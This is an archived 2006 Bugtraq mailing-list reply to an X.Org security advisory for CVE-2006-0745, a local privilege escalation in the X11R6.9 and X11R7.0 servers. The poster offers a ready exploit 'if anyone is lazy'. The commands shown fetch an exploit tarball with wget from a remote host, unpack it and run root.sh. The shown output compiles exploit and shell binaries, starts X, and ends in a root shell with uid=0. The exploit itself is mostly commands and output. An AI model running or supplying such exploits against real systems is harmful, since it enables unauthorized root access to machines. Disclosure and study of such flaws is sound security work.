lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 20 Mar 2006 13:40:45 -0600 From: H D Moore <sflist@...italoffense.net> To: bugtraq@...urityfocus.com Subject: Re: [CVE-2006-0745] X.Org Security Advisory: privilege escalation and DoS in X11R6.9, X11R7.0 Two second exploit, but if anyone is lazy: $ wget http://metasploit.com/users/hdm/tools/xmodulepath.tgz $ tar -zpxvf xmodulepath.tgz $ cd xmodulepath $ ./root.sh /bin/rm -f exploit.o exploit.so shell *.o *.so gcc -fPIC -c exploit.c gcc -shared -nostdlib exploit.o -o exploit.so gcc -o shell shell.c X Window System Version 7.0.0 Release Date: 21 December 2005 X Protocol Version 11, Revision 0, Release 7.0 [ snip ] r00t # id uid=0(root) gid=100(users) groups=10(wheel),18(audio)... On Monday 20 March 2006 08:00, Daniel Stone wrote: > X.Org Security Advisory, March 20th 2006 > Local privilege escalation in X.Org server 1.0.0 and later; X11R6.9.0 > and X11R7.0 > CVE-ID: CVE-2006-0745
Powered by blists - more mailing lists